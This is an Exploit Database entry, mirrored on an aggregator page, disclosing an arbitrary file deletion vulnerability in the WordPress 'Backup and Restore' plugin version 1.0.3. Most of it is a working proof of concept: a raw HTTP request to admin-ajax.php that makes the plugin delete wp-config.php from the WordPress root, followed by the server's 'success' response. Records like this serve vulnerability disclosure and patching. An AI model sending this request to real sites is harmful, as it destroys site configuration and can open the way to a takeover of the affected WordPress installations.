WordPress Plugin Backup and Restore 1.0.3 – Arbitrary File Deletion

• Exploit Database
• 56 阅读

• 作者： Murat DEMİRCİ
  日期： 2021-11-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50503/

• # Exploit Title: WordPress Plugin Backup and Restore1.0.3 - Arbitrary File Deletion
  # Date: 11/07/2021
  # Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
  # Vendor Homepage: https://www.miniorange.com/
  # Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/
  # Version: 1.0.3
  # Tested on : Windows 10
  
  #Poc:
  
  ----------------------------------REQUEST---------------------------------------
  
  POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Content-Length: 155
  Origin: http://localhost
  Connection: close
  Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  
  action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce
  
  
  ----------------------------------------------------------------------------------
  
  
  
  -------------------------------RESPONSE-------------------------------------------
  
  HTTP/1.1 200 OK
  Date: Sun, 07 Nov 2021 13:19:38 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
  X-Powered-By: PHP/8.0.7
  Access-Control-Allow-Origin: http://localhost
  Access-Control-Allow-Credentials: true
  X-Robots-Tag: noindex
  X-Content-Type-Options: nosniff
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  X-Frame-Options: SAMEORIGIN
  Referrer-Policy: strict-origin-when-cross-origin
  Content-Length: 9
  Connection: close
  Content-Type: application/json; charset=UTF-8
  
  "success"
  
  ----------------------------------------------------------------------------------